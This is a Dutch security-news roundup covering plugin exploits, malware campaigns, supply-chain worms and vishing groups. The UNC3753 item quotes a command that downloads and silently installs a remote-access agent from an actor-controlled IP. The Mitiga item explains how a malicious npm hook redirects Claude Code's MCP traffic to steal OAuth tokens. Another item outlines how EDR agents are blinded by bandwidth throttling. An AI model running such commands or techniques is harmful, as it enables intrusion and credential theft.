Aanvallers maken momenteel actief misbruik van kwetsbaarheden in twee populaire WordPress-plug-ins: Everest Forms Pro en Burst Statistics. Deze beveiligingslekken stellen ongeauthenticeerde aanvallers in staat om administratoraccounts aan te maken, waardoor zij volledige controle over de getroffen websites kunnen verkrijgen.

Burst Statistics is een plug-in die door meer dan tweehonderdduizend websites wordt gebruikt om bezoekersinformatie te verzamelen. De ontwikkelaars omschrijven het als een privacyvriendelijk alternatief voor Google Analytics. Een kritieke kwetsbaarheid in de authenticatiefunctie van deze plug-in controleert onvoldoende of een opgegeven wachtwoord correct is. Dit betekent dat een aanvaller die de gebruikersnaam van een beheerder kent, in combinatie met een willekeurig wachtwoord, een nieuw admin account kan aanmaken. De ontwikkelaar heeft dit probleem op 12 mei verholpen met de release van versie 3.4.2. Echter, cybersecuritybedrijf Wordfence rapporteert dat aanvallers sinds 13 mei, de dag na de patch, actief misbruik maken van dit lek. De afgelopen weken zijn meer dan 110.000 aanvalspogingen waargenomen gericht op deze kwetsbaarheid.

De tweede plug-in, Everest Forms Pro, wordt gebruikt voor het ontwerpen van contactformulieren, nieuwsbrieven, quizzen en betaalformulieren. De kwetsbaarheid die actief wordt misbruikt, bevindt zich in de betaalde versie van de plug-in, die naar schatting op vierduizend websites actief is. Via dit lek kunnen ongeauthenticeerde aanvallers specifiek voorbereide waarden invoeren in een formulier van de WordPress-site. Dit maakt het mogelijk om PHP code uit te voeren op de onderliggende server. Ook bij aanvallen op Everest Forms Pro is het primaire doel van de aanvallers het creëren van een admin account. Wordfence heeft ongeveer dertigduizend aanvallen waargenomen die gericht waren op dit beveiligingslek. Websitebeheerders wordt geadviseerd om hun plug-ins zo snel mogelijk bij te werken naar de nieuwste versies om deze dreiging te mitigeren.

Bron: Wordfence

Aanvallers maken gebruik van SEO-vergiftiging om valse installatiepagina’s van Anthropic’s Claude Code bovenaan in zoekresultaten te plaatsen, met als doel de verspreiding van malware. Deze gerichte aanpak viseert voornamelijk beginnende ontwikkelaars. De aanval maakt gebruik van de ClickFix social engineering techniek, waarbij het slachtoffer wordt misleid om een kwaadaardig MSHTA-commando uit te voeren via het Windows uitvoervenster.

De infectieketen begint met de inzet van een 6,7 MB groot polyglotbestand dat zowel MP3 als HTA is. Dit bestand is ontworpen om tijdens beveiligingsscans door te gaan voor afspeelbare audio, maar bevat een verborgen HTA-scriptblok. Na de uitvoering van het HTA-script volgen fileless PowerShell-stappen, waarna een reflectieve .NET infostealer wordt geladen. Deze infostealer draait volledig in het geheugen, zonder bestanden op schijf aan te maken.

De primaire functie van de infostealer is het stelen van inloggegevens die zijn opgeslagen in browser-opslag. Voor command and control (C2) communiceert de malware met Russische infrastructuur via diverse subdomeinen. Deze methode van aanval toont een toenemende verfijning in het omzeilen van traditionele beveiligingsmaatregelen door het ontbreken van persistente bestanden en het gebruik van legitiem ogende bestandsformaten.

Bron: Cybersecurity News

Techgigant Toshiba en retailer Muji hebben bezoekers gewaarschuwd voor verdachte aanmeldschermen die op hun websites verschenen en mogelijk inloggegevens konden verzamelen. Beide Japanse bedrijven adviseren gebruikers die hun accountgegevens hebben ingevoerd in deze authenticatieschermen, hun wachtwoorden onmiddellijk te wijzigen voor de betreffende dienst.

De loginprompts werden gegenereerd door de externe dienst gehost op polyfill[.]io. Dit domein introduceerde in 2024 al malafide code in scripts die via zijn Content Delivery Network (CDN) werden geleverd. Toshiba meldde in een korte communicatie: "We hebben bevestigd dat delen van onze website een aanmeldscherm kunnen weergeven zoals hieronder getoond. We werken momenteel aan het elimineren van dit scherm, maar als u het ziet, selecteer dan 'Annuleren' zonder enige informatie in te voeren."

De Japanse retailgigant Muji publiceerde eerder deze week een vergelijkbare waarschuwing. Muji stelt dat er op dit moment geen ongeautoriseerde toegang of informatielekkage is bevestigd, maar adviseert klanten desondanks voorzorgsmaatregelen te nemen. Zowel Toshiba als Muji hebben de problemen inmiddels opgelost en de dienst opgeschort.

Japanse media hebben eveneens gemeld dat Zojirushi, FiNC Technologies, Ishiyaku Publishers en het online uitgeversmerk Hobonichi door hetzelfde probleem werden getroffen. Beveiligingsonderzoeker Pasquale Pillitteri rapporteerde daarnaast dat ook Samsung Smart TV's en websites op 1 juni een loginprompt vertoonden.

De oorzaak van het probleem lijkt terug te voeren op een incident in 2024, toen het domein polyfill[.]io werd overgenomen door een Chinese entiteit. Deze entiteit voegde kwaadaardige scripts toe die destijds meer dan 100.000 websites troffen die de Polyfill-dienst gebruikten. Polyfill is een JavaScript CDN dat moderne websites compatibel maakt met oudere browsers door een compatibiliteitslaag te bieden voor niet-ondersteunde technologieën.

De oorspronkelijke code van Polyfill werd geleverd via een CDN op polyfill[.]io, maar het domein was niet in eigendom van de maker van het open source project, Andrew Betts. Toen het domein afliep, kon het door iedereen worden geclaimd. Betts reageerde destijds publiekelijk door website-eigenaren aan te raden de dienst van hun sites te verwijderen en lanceerde een nieuwe JavaScript CDN-dienst op polyfill.com, later gevestigd op polyfill.top.

Hoewel de deactivering van de dienst op polyfill[.]io de omleidingen stopte, zijn sommige sites die de dienst gebruikten er de afgelopen twee jaar niet in geslaagd om al hun pagina's op te schonen, waardoor restanten van de Polyfill-code achterbleven. Pillitteri meldt dat het polyfill[.]io-domein eind mei 2026 opnieuw actief werd en begon te reageren met HTTP 401 authenticatieverzoeken. Browsers van gebruikers die pagina's bezoeken, zoals die van Toshiba en Muji, interpreteren dit als een verzoek om een gebruikersnaam en wachtwoord, waarna een loginprompt wordt weergegeven.

Op dit moment is er geen indicatie dat de getroffen websites zijn gehackt of dat referenties die op deze malafide aanmeldschermen zijn ingevoerd, daadwerkelijk zijn gestolen. Gebruikers wordt echter ten zeerste aanbevolen voorzichtig te zijn met onverwachte authenticatieprompts en bij twijfel geen gegevens in te voeren.

Bron: Toshiba en Muji | Bron 2: global.toshiba | Bron 3: itmedia.co.jp

Een Chinese spionagegroep, bekend als UNC5221 en ook getraceerd als VerdantBamboo, heeft nieuwe malware ingezet om langdurige toegang te behouden tot gecompromitteerde netwerken. De groep maakt misbruik van de Brickstorm backdoor en twee recent ontdekte malwarevarianten genaamd Plenet en AgentPSD om toegang te krijgen tot Microsoft 365 omgevingen.

Onderzoek naar een incident, uitgevoerd door Volexity, onthulde dat de dreigingsactor minstens achttien maanden vóór detectie al toegang had tot het netwerk van het slachtoffer. Bovendien bleek de managed services provider (MSP) van de getroffen organisatie eveneens te zijn gecompromitteerd. UNC5221 staat erom bekend sinds 2023 zero day kwetsbaarheden in edge apparaten te misbruiken.

De Brickstorm backdoor, door onderzoekers omschreven als een "geavanceerde malware implant", werd meer dan een jaar onopgemerkt gebruikt in de omgevingen van verschillende doelen in de Verenigde Staten, totdat de inbreuken rond maart 2025 werden ontdekt. De initiële versies van Brickstorm waren geschreven in Golang, waarna nieuwere varianten in Rust verschenen. Google documenteerde de activiteit van UNC5221 met deze backdoor in april 2024 en opnieuw in september 2025, waarbij aanvallen op juridische dienstverleners, software as a service providers, business process outsourcers en technologiebedrijven werden beschreven. CISA waarschuwde eerder al voor de inzet van Brickstorm door Chinese hackers tegen VMware vSphere servers, en Google rapporteerde recentelijk dat UNC6201 de malware gebruikte tegen Dell RecoverPoint for Virtual Machines.

Volexity ontdekte vorig jaar dat VerdantBamboo een Egnyte Storage Sync systeem had gecompromitteerd en hier periodiek toegang toe verkreeg via de web SSL VPN van het slachtoffer. Vanuit deze positie en met behulp van Brickstorm proxy functionaliteiten en gestolen inloggegevens, kreeg de dreigingsactor toegang tot de Microsoft 365 omgeving van de organisatie. De onderzoekers van Volexity achten het zeer waarschijnlijk dat dit gebeurde om op te gaan in legitiem netwerkverkeer en zo Conditional Access beleid te omzeilen dat anders toegang zou hebben voorkomen.

Later bleek dat de hackers minstens achttien maanden op het netwerk aanwezig waren geweest voordat ze werden gedetecteerd. Bovendien wist VerdantBamboo de organisatie opnieuw te compromitteren nadat de onderzoekers de herstelwerkzaamheden hadden voltooid. Tijdens deze tweede inbraak gebruikten de aanvallers gestolen inloggegevens om SSL VPN toegang op de firewall van het slachtoffer in te schakelen en te configureren. Vervolgens maakten ze verbinding met interne systemen en implementeerden ze aanvullende op maat gemaakte malware op een Synology NAS apparaat. Dit leidde tot een onderzoek bij de MSP van de klant, waar Volexity ontdekte dat VerdantBamboo een BSD variant van Brickstorm op een pfSense firewall had geplaatst. Deze firewall was, net als het Storage Sync systeem van de getroffen organisatie, minstens achttien maanden eerder gecompromitteerd. Volexity heeft een gemiddeld vertrouwen dat de aanvaller vanuit de MSP naar de omgeving van de slachtofferorganisatie is doorgedrongen. Brickstorm werd vervolgens ingezet op de Egnyte Storage Sync appliance van het slachtoffer en op een buiten gebruik gestelde Linux GroupWise e mailarchiefserver.

Enkele dagen later keerden de aanvallers terug en herstelden ze de toegang tot de infrastructuur van het slachtoffer. Ze implementeerden toen de op maat gemaakte malware Plenet op een Synology NAS appliance. Plenet, door Google ook getraceerd als "Grimbolt", is een cross platform .NET gebaseerde backdoor die interactieve shell toegang, uitvoering van commando's op afstand, bestandsmanipulatie en het wisselen van command and control (C2) servers mogelijk maakt. De onderzoekers merken op dat Plenet qua ontwerp lijkt op Brickstorm, met gebruik van het WebSocket protocol voor C2 communicatie en een multiplexing bibliotheek voor gelijktijdige datastromen naar de server.

AgentPSD is een eenvoudig Python gebaseerde reverse shell utility. Volexity vermoedt dat VerdantBamboo deze gebruikte als een terugval mechanisme voor persistentie, mocht andere malware niet langer toegankelijk zijn. De onderzoekers ontdekten dat AgentPSD was geconfigureerd om verbinding te maken met een ander domein dan datgene dat Brickstorm gebruikte. De malware werd echter nooit ingezet, aangezien Brickstorm nog steeds actief was, wat de inschatting ondersteunt dat AgentPSD een secundair toegangsmechanisme was.

Tijdens het onderzoek probeerde Volexity de infrastructuur van VerdantBamboo te achterhalen. De onderzoekers ontwikkelden een fingerprint om IP adressen en domeinen te identificeren die Brickstorm gebruikte voor C2 communicatie. Hoewel meerdere machines werden geïdentificeerd, haalde de dreigingsactor de infrastructuur offline voordat de onderzoekers andere systemen konden onthullen. Tussen 18 en 23 september schakelden alle servers die eerder aan het patroon voldeden hun diensten op poort 443 uit. Rond diezelfde tijd publiceerde Google ook een nieuw rapport over de activiteit van Brickstorm, wat mogelijk suggereert dat de aanvaller op de hoogte was van het onderzoek naar hun operaties. Volexity omschrijft VerdantBamboo/UNC5221 als een "zeer geavanceerde dreigingsactor" die living off the land technieken en malware combineert en systemen aanvalt die niet direct... (tekst ingekort)

Bron: Volexity | Bron 2: learn.microsoft.com | Bron 3: github.com

Op 1 juni 2026 hebben experts van meerdere cybersecuritybedrijven een omvangrijke supply chain compromittering ontdekt die softwarecomponenten van Red Hat treft. Beveiligingsfirma's Microsoft, Wiz Research, Snyk en Aikido rapporteerden dat aanvallers schadelijke code hebben geïnjecteerd in softwarepakketten onder de naam @redhat-cloud-services op npm, een openbare bibliotheek waar ontwikkelaars bouwstenen voor hun code vandaan halen.

De kwestie had gevolgen voor ten minste 32 pakketten, wat leidde tot 96 gecompromitteerde versies. Deze pakketten zijn essentieel voor het functioneren van de Red Hat Hybrid Cloud Console en worden wekelijks tussen de 80.000 en 117.000 keer gedownload. Gezien de brede integratie van deze modules, reikt de impact verder dan de infrastructuur van Red Hat zelf, tot externe ontwikkelpijplijnen.

De aanvallers maakten geen gebruik van wachtwoordraden of typosquatting. In plaats daarvan kregen zij toegang tot het persoonlijke GitHub-account van een legitieme Red Hat-medewerker. Via dit account hebben zij verborgen code wijzigingen (kwaadaardige "orphan commits") rechtstreeks in twee RedHatInsights repositories gepusht, zonder dat deze code werd beoordeeld.

Deze wijzigingen vonden plaats in twee golven van activiteit en introduceerden een minimaal GitHub Actions workflow. Dit workflow vroeg kortstondige OIDC identity tokens aan bij GitHub. Het systeem gebruikte deze tokens vervolgens om direct te authenticeren met npm's trusted publishing endpoint en de besmette pakketten te uploaden. Omdat de code afkomstig leek van een legitieme Red Hat-configuratie, werden de gecompromitteerde versies geleverd met geldige SLSA provenance attestations, waardoor ze authentiek leken voor beveiligingsscanners.

Onderzoekers hebben deze specifieke malwarevariant Miasma genoemd. Het opereert als een zelf-propagerende worm en credential stealer, gebaseerd op Mini Shai-Hulud. Dit is een open source malware framework dat eerder in 2026 werd gepubliceerd op BreachForums door de dreigingsgroep TeamPCP. De nieuwe versie van de malware vervangt oude ruimtevaartthema's door termen uit de Griekse mythologie, zoals Spartan.

Wanneer een ontwikkelaar een van deze besmette pakketten installeert, wordt automatisch een verborgen preinstall script geactiveerd voordat normale code wordt uitgevoerd. Dit script zoekt onmiddellijk naar gevoelige gegevens op de computer. Dit omvat cloud login keys voor Google Cloud, Microsoft Azure en Amazon Web Services, evenals SSH keys, wachtwoordgegevens en keys voor AI tools zoals Claude en Gemini. Daarnaast bevraagt de worm de npm registry voor andere pakketten die de geïnfecteerde identiteit mag wijzigen. Vervolgens publiceert het automatisch die pakketten opnieuw met dezelfde kwaadaardige payload, waardoor een enkele gecompromitteerde werkstation kan uitgroeien tot een vector om meer registries te infecteren.

De beheerders van de registry hebben de meeste kwaadaardige versies binnen enkele uren na de openbaarmaking ingetrokken, maar het onderzoek naar de supply chain voortgezet. Beveiligingsteams wordt geadviseerd om hun lockfiles te controleren, install scripts te blokkeren met de 'ignore-scripts' configuratie, en onmiddellijk alle cloud credentials of tokens te roteren die toegankelijk waren vanuit getroffen build environments.

Bron: Snyk | Bron 2: aikido.dev

Onderzoekers van het Slowaakse cybersecuritybedrijf ESET hebben een nieuwe Android spyware ontdekt, genaamd Asin, die zich richt op Arabischtalige gebruikers. De malware wordt verspreid via diverse campagnes die sinds begin 2025 zijn waargenomen. Elke aanvalsgolf maakt gebruik van specifieke websites die legitieme apps, oorlogsgerelateerde updates en overheidsnieuwsbronnen nabootsen.

De websites die ESET heeft geïdentificeerd, zijn govlens[.]net, dat een overheidsnieuwsbron imiteert en op 27 mei 2025 is geregistreerd; pdf-reader[.]help, dat zich voordoet als een veilige PDF-editor en op 29 mei 2025 is geregistreerd; en live-war-map[.]com, dat updates over militaire incidenten belooft en op 20 januari 2025 is geregistreerd. Twee van deze websites, govlens[.]net en live-war-map[.]com, werden ook gepromoot via speciale accounts op sociale mediaplatforms zoals Facebook en Telegram, waaronder de Facebook-pagina www.facebook[.]com/GovLens.

Volgens ESET distribueert elk van deze websites een kwaadaardige app die legitieme functionaliteit combineert met heimelijke spywaremogelijkheden. Het cybersecuritybedrijf merkt op dat de naam van het Telegram-kanaal waarschijnlijk is geïnspireerd op Live Universal Awareness Map (Liveuamap), een legitiem en bekend platform dat zich richt op het in kaart brengen van lopende conflicten, mensenrechtenkwesties, natuurrampen en geopolitieke gebeurtenissen wereldwijd.

Meerdere artefacten die verband houden met Asin zijn inmiddels geïdentificeerd. Een daarvan werd in oktober 2025 vanuit Turkije geüpload naar VirusTotal. Een andere APK werd in december 2025 gedownload van het domein c-pdf[.]net door een gebruiker op een Xiaomi Redmi Note 13 Pro-apparaat met Android 15. Een derde sample, dat zich voordeed als "Syria Defense Map", werd rond half januari 2026 gedetecteerd op een Xiaomi Redmi Note 13 Pro+ 5G-apparaat met Android 15. In dit laatste geval werd de APK gedownload van de website syriadefensemap[.]com. Gebruikers moeten de app handmatig installeren en de benodigde machtigingen verlenen voordat de spyware zijn doelen kan realiseren.

De activiteit van de groep achter Asin is volgens ESET nog niet toegeschreven aan een specifieke actor en de primaire doelen van deze campagnes zijn onbekend. Echter, op basis van de gebruikte lokmiddelen wordt vermoed dat journalisten en OSINT (Open Source Intelligence)-onderzoekers in Arabischtalige regio's het doelwit kunnen zijn geweest. Drie van de vijf frauduleuze apps die ESET heeft ontdekt - GovLens, WarMap en Syria Defense Map - lijken voornamelijk bedoeld voor mensen die geïnteresseerd zijn in openbronnenonderzoek. Dit suggereert dat de activiteiten, in ieder geval gedeeltelijk, gericht waren op Arabischtalige journalisten of OSINT-professionals.

Bron: ESET | Bron 2: welivesecurity.com

De Google Threat Intelligence Group Mandiant heeft een financieel gemotiveerde campagne voor datadiefstal en afpersing blootgelegd, uitgevoerd door de dreigingscluster UNC3753, ook bekend onder de namen "Luna Moth", "Chatty Spider" en "Silent Ransom Group". Tussen januari en mei 2026 werden tientallen organisaties in de professionele, juridische en financiële dienstverlening in de Verenigde Staten het doelwit. Deze aanvallers maken gebruik van geavanceerde voice phishing (vishing) en sociale engineering technieken om toegang te verkrijgen tot bedrijfsomgevingen.

De campagne begint vaak met goedaardige, factuur gerelateerde e-mails die geen kwaadaardige links of bijlagen bevatten. Het primaire doel van deze e-mails is het creëren van een voorwendsel en het wekken van interne beveiligingsbezwaren bij het doelwit, waardoor zij ontvankelijker worden voor daaropvolgende telefoongesprekken.

UNC3753 voert vervolgens gerichte vishing aanvallen uit. De actoren doen zich voor als IT ondersteuning of leden van het interne beveiligingsteam en benaderen medewerkers van alle niveaus, vaak personen wier contactgegevens openbaar op de website van de organisatie staan vermeld. Onder het mom van het oplossen van een beveiligingsprobleem of het ondersteunen van een datamigratieproject, bouwen de aanvallers vertrouwen op en overtuigen zij het slachtoffer om deel te nemen aan een schermdeel sessie en Remote Monitoring and Management (RMM) tools te downloaden.

Eenmaal binnen de omgeving zoeken de dreigingsactoren direct naar en exfiltreren zij gevoelige gegevens, of manipuleren zij het slachtoffer om deze acties namens hen uit te voeren. De gestolen data omvat doorgaans bedrijfseigen juridische overeenkomsten, persoonlijk identificeerbare informatie (PII) en financiële gegevens, die vervolgens worden gebruikt voor afpersingsdoeleinden.

Een bijzonder zorgwekkend aspect van deze campagne is dat in sommige gevallen, mogelijk gelinkt aan UNC3753, de dreigingsactoren fysiek toegang hebben verkregen tot systemen van slachtoffers. Personen die zich voordeden als IT technici betraden bedrijfskantoren om direct data van endpoints te exfiltreren met behulp van USB opslagmedia.

Het operationele model van UNC3753 kenmerkt zich door een hoge snelheid. In veel onderzochte incidenten vond de gehele aanvalssequentie - van initieel contact tot datadiefstal en afpersing - plaats binnen één werkdag. Mandiant heeft recentelijk waargenomen dat het zoeken naar data, het klaarzetten en de diefstal al in minder dan een uur werden geïnitieerd.

Voor schermdeel sessies maken de aanvallers gebruik van legitieme diensten zoals Zoom, Microsoft Terminal Services, Microsoft Teams en Quick Assist. Voor meer persistente toegang proberen zij slachtoffers te overtuigen om RMM agents zoals AnyDesk, Bomgar of Zoho Assist te installeren. In één geval werd geprobeerd een "SuperOps RMM agent" te installeren via een cURL commando, zoals: `curl -sL "http://[actor-controlled-ip]/installer" -o "SuperOps.msi" && msiexec /i "SuperOps.msi" /quiet`. De communicatie van installatielinks en commando's gebeurt consistent via privnote[.]com, een web gebaseerde, zelfvernietigende tekst utility, om sporen op endpoints te vermijden.

Bron: Mandiant | Bron 2: virustotal.com

Wachtwoordmanager Dashlane heeft meer details vrijgegeven over een recente bruteforce aanval waarbij de wachtwoordkluis van een klein aantal klanten werd gestolen. De aanvallers richtten zich op de API endpoints die Dashlane gebruikt voor de registratie van nieuwe apparaten.

Gebruikers van Dashlane kunnen extra apparaten, zoals telefoons of computers, aan hun account toevoegen. Voor de verificatie van de identiteit van de accounthouder stuurt Dashlane een zescijferig token naar het e-mailadres van de gebruiker. Indien tweefactorauthenticatie (2FA) is ingeschakeld, moet de gebruiker een code genereren via een authenticatie app. De ontvangen of gegenereerde code wordt vervolgens in de Dashlane app ingevoerd. Na succesvolle verificatie registreert Dashlane het nieuwe apparaat en downloadt een kopie van de online wachtwoordkluis naar het zojuist toegevoegde apparaat.

Bij de bruteforce aanval verstuurden de aanvallers een groot aantal geautomatiseerde requests naar de API endpoints voor apparaatregistratie. Voordat de aanval volledig kon worden gestopt, slaagden de aanvallers erin om geldige tokens te bruteforcen en te genereren voor minder dan twintig gebruikers. Dit stelde de aanvallers in staat om een nieuw apparaat aan het account van deze gebruikers toe te voegen, waarna de versleutelde wachtwoordkluis op het apparaat van de aanvaller werd gedownload.

Dashlane benadrukt dat de gestolen wachtwoordkluizen versleuteld zijn. Om toegang te krijgen tot de inhoud, moeten de aanvallers het master password van de betreffende accounts kraken. De wachtwoordmanager heeft aangekondigd extra verificatiemaatregelen te zullen invoeren voor het toevoegen van nieuwe apparaten om dergelijke aanvallen in de toekomst te voorkomen.

Bron: Dashlane

Cybersecurityonderzoekers hebben een voorheen onbekende dreigingsgroep genaamd OP-512 (waarbij "OP" staat voor "opponent") ontdekt, die zich richt op Microsoft Internet Information Services (IIS) servers om een op maat gemaakt web shell framework te implementeren. ReliaQuest schat met matig tot hoog vertrouwen in dat deze spionagegerichte activiteit gerelateerd is aan China.

Volgens een rapport van ReliaQuest voerde OP-512 hoogstwaarschijnlijk spionage uit via een gecompromitteerde IIS-webserver bij een organisatie waarvan de sector en geografie overeenkomen met de inlichtingenprioriteiten van China. Hoewel er geen overlappingen zijn gevonden tussen OP-512 en andere bekende Chinese adversarials, is het de vierde dergelijke dreigingsgroep - na CL-STA-0048, DragonRank en GhostRedirector - die zich de afgelopen twaalf maanden specifiek richt op IIS-webservers. Vorige maand onthulde Cisco Talos nog dat meerdere Chinese cybercrimegroepen een variant van malware genaamd BadIIS delen om IIS-servers te infecteren. Ook SHADOW-EARTH-053 heeft zich gericht op IIS-servers als onderdeel van een spionagecampagne die overheids- en defensiesectoren in Zuid-, Oost- en Zuidoost-Azië trof.

De kern van de operaties van OP-512 is een op maat gemaakt web shell framework, bestaande uit drie web shells. Deze geven de aanvallers toegang op afstand tot de gecompromitteerde host, terwijl stappen worden ondernomen om op handtekeningen gebaseerde detectie te omzeilen. Ze bemoeilijken forensische tijdlijnen door technieken zoals timestomping te gebruiken, waarbij de tijdstempels van web shell artefacten opzettelijk worden gemanipuleerd. Dit houdt concreet in dat alle bestanden en submappen rondom de geplaatste web shells worden gescand, de mediane 'laatst gewijzigd'-tijdstempel wordt berekend, en de eigen aanmaak- en wijzigingstijden worden overschreven om overeen te komen met deze waarde. Dit geeft de indruk dat de web shells al langere tijd aanwezig zijn op het systeem.

ReliaQuest merkte op dat dit framework capaciteiten combineert die zelden samen worden gezien. Elke implementatie wordt uniek gegenereerd, toegang is beperkt tot de aanvaller via cryptografische controles, en gecompromitteerde servers rapporteren automatisch terug voor gecentraliseerd beheer op schaal.

OP-512 vertoont tactische gelijkenis met CL-STA-0048, wat de mogelijkheid doet rijzen dat het een bestaande groep betreft die zijn toolset volledig heeft vernieuwd, of dat het deze capaciteiten onafhankelijk heeft ontwikkeld. Ongeacht de oorsprong wordt de hackinggroep beschouwd als een afzonderlijke cluster die autonoom opereert.

Bij de door het cybersecuritybedrijf geobserveerde aanval bleek de dreigingsactor zich te richten op een oudere IIS-server die draaide op Windows Server 2016 met het end-of-life .NET Framework 4.0. Er was bewijs van eerdere activiteit op dezelfde host, ongeveer 75 dagen voordat het hoofincident plaatsvond. Dit omvatte DNS-query's naar een ander, door de aanvaller gecontroleerd domein ("ashx.lhlsjcb[.]com").

De reeks acties die weken later volgde, wordt beschreven als een "sprint", waarbij de aanvaller het worker-proces van de webserver ("w3wp.exe") gebruikte om een van de web shells in de uploadmap van de applicatie te plaatsen. Dit activeerde op zijn beurt een zelfrapporterend mechanisme dat een DNS-query of een HTTP-verzoek als fallback gebruikt om de locatie van de web shell naar een door de aanvaller gecontroleerd domein te verzenden. De onderzoekers van ReliaQuest legden uit dat de drie web shells de aanvaller gezamenlijk bestandsbeheer, geauthenticeerde command-uitvoering via twee onafhankelijke toegangspaden, en geautomatiseerde rapportage van de compromittering gaven, nog voordat iemand tijd had om te reageren.

Nadat de web shells waren geïmplementeerd, heeft OP-512 geprobeerd privileges te escaleren naar het SYSTEM-niveau met behulp van de Potato Suite. Vervolgens werden commando's zoals "whoami /priv" uitgevoerd om de systeemrechten te bevestigen. ReliaQuest stelt dat vier aan China gerelateerde clusters die dezelfde technologie in minder dan een jaar tijd aanvallen, waarschijnlijk geen toeval is. Internet-gerichte IIS-servers die verouderde, niet-ondersteunde software draaien, blijven een voorkeurstoegangspunt binnen dit dreigingsecosysteem en vertonen geen tekenen van vertraging. Het meest zorgwekkende aan OP-512 is dat deze dreigingsgroep geen standaard tools gebruikt, maar een speciaal gebouwd framework dat is ontworpen om de detectiemethoden te omzeilen die effectief zijn tegen de andere drie clusters. Organisaties die hun verdediging hebben afgestemd op bekende actoren, zijn hier waarschijnlijk niet tegen gedekt.

Bron: ReliaQuest

Een nieuwe cybercrime groep, genaamd Pink, richt zich op bedrijfsdata voor financiële afpersing. De onderzoekstak van Palo Alto Networks, Unit 42, heeft deze dreiging als eerste blootgelegd. De groep wordt vermoedelijk gelinkt aan het bredere Com netwerk en door de onderzoekers gevolgd onder de cluster code CL-CRI-1147. Op 31 mei 2026 lanceerde Pink een speciale data lek site, waarop de namen van diverse eerste slachtoffers verschenen. Voortbouwend op de data van Unit 42, publiceerde beveiligingsanalysebedrijf Gurucul op 4 juni 2026 een aanvullende analyse om bedrijven te helpen de sporen van de groep binnen bedrijfsnetwerken te detecteren.

Uit onderzoek van Unit 42 blijkt dat Pink traditionele malware payloads vermijdt. In plaats daarvan vertrouwen de dreigingsactoren op voice phishing, of vishing, om zakelijke gebruikers te targeten. Door zich telefonisch voor te doen als interne ICT-medewerkers, manipuleren de hackers werknemers om frauduleuze inlogpagina's te bezoeken, zoals passkeyadd.com of passkeydeploy.com.

Wanneer een werknemer in de val trapt en zijn gegevens invoert, stelen de hackers de actieve inlogsessie. Dit stelt hen in staat om de meervoudige authenticatie te omzeilen. Vervolgens krijgen zij toegang tot het Microsoft 365 systeem van het bedrijf en gebruiken zij de eigen geautomatiseerde tools van Microsoft om cloud opslag te doorzoeken. Binnen enkele minuten worden gevoelige bestanden uit OneDrive en SharePoint mappen gehaald.

Zodra de data is veiliggesteld, begint de afpersing. Pink gebruikt de gecompromitteerde werknemersaccounts om e-mails naar collega's te sturen en interne Microsoft Teams berichten te verzenden, waarin betaling wordt geëist. Bestuurders krijgen een strakke deadline van 72 uur om te reageren.

Na de openbaarmaking door Unit 42 analyseerde Gurucul hoe Pink na de initiële toegang opereert op lokale werkstations. In een advies dat op 4 juni 2026 werd gepubliceerd, merkte Gurucul op dat Pink bestandsloze methoden gebruikt om verborgen te blijven. In plaats van een omvangrijk, opvallend virus op een harde schijf te downloaden, implementeren de hackers kleine code commando's die zich verbergen in legitieme systeempaden. De software bouwt zijn hoofdcode direct op in de tijdelijke geheugencache van de computer, waardoor deze volledig onzichtbaar is voor standaard antivirus mapscanners. Gurucul ontdekte ook dat de code eerst de computeromgeving controleert; als het een sandbox of een analyse laboratorium van beveiligingsteams detecteert, verbergt het zijn gedrag.

Omdat Pink legitieme cloud tools en authentieke accounttoegang gebruikt, hebben standaard firewalls moeite om de dreiging te detecteren. Experts adviseren werknemers te trainen om onverwachte telefoontjes van de ICT-afdeling onafhankelijk te verifiëren. Degenen die verantwoordelijk zijn voor netwerkbeveiliging moeten ook zoeken naar ongebruikelijke geautomatiseerde scripts in hun logs, de bekende webdomeinen van de groep blokkeren en gedragsmonitoring gebruiken om massale, plotselinge bestand downloads te onderscheppen voordat de data het bedrijf verlaat.

Bron: Palo Alto Networks' Unit 42 | Bron 2: github.com | Bron 3: gurucul.com

Onderzoekers van Mitiga Labs hebben een aanvalsketen van vijf stappen gedemonstreerd waarmee het Model Context Protocol (MCP)-verkeer van Claude Code ongemerkt kan worden omgeleid naar infrastructuur van een aanvaller. Daarbij worden OAuth-bearertokens onderschept die persistente en brede toegang verlenen tot gekoppelde SaaS-platforms zoals Jira, Confluence en GitHub.

De aanval kan alleen slagen als het slachtoffer eerst een kwaadaardig npm-pakket installeert. Dat pakket bevat een postinstall-hook die ongemerkt het lokale configuratiebestand van Claude Code, ~/.claude.json, herschrijft en de MCP-server laat verwijzen naar een proxy van de aanvaller. Het gaat dus niet om een fout op afstand in Claude Code zelf, maar om een techniek voor tokendiefstal en persistentie nadat de werkomgeving al is gecompromitteerd.

Zodra Claude Code een MCP-sessie opzet of vernieuwt, loopt het verkeer via die proxy en belandt het token bij de aanvaller. Roteert de gebruiker het token of past hij de configuratie aan, dan herstelt de hook de kwaadaardige instelling bij de volgende keer laden. Omdat de verzoeken via de vertrouwde uitgaande verbindingen van de aanbieder verlopen, zijn ze in logbestanden lastig te onderscheiden van legitiem verkeer.

Mitiga Labs meldde de bevindingen op 10 april 2026 aan Anthropic, de ontwikkelaar van Claude Code. Anthropic beoordeelde de melding op 12 april 2026 als buiten de scope van het beveiligingsprogramma en noemde het gedrag bewust ontworpen, omdat de gebruiker eerst zelf het pakket installeert en de MCP-server toestemming geeft. Er is daarom geen patch aangekondigd. Organisaties die Claude Code koppelen aan platforms als Jira, Confluence en GitHub kunnen het risico beperken door uitsluitend vertrouwde pakketten te installeren, het bestand ~/.claude.json te bewaken en de verleende MCP-autorisaties periodiek te controleren.

Bron: Mitiga Labs

Op 08 juni 2026 is een nieuwe open source red team tool uitgebracht genaamd EDRChoker. Deze tool introduceert een innovatieve methode om cloud gekoppelde Endpoint Detection and Response (EDR) agenten te neutraliseren. In tegenstelling tot traditionele methoden, zoals het beëindigen van processen of het injecteren van code, werkt EDRChoker door de netwerkbandbreedte van deze EDR-agenten stilletjes te beperken tot vrijwel nul.

De techniek maakt gebruik van de native Policy-Based Quality of Service (QoS) engine van het besturingssysteem van Windows. Door de bandbreedte te 'verstikken', wordt de communicatie van de EDR-agenten met hun cloud backend effectief lamgelegd. Dit betekent dat de EDR-oplossingen hun detectiegegevens niet meer kunnen versturen en geen commando's meer kunnen ontvangen, waardoor ze hun functionaliteit verliezen zonder dat de processen direct worden afgesloten.

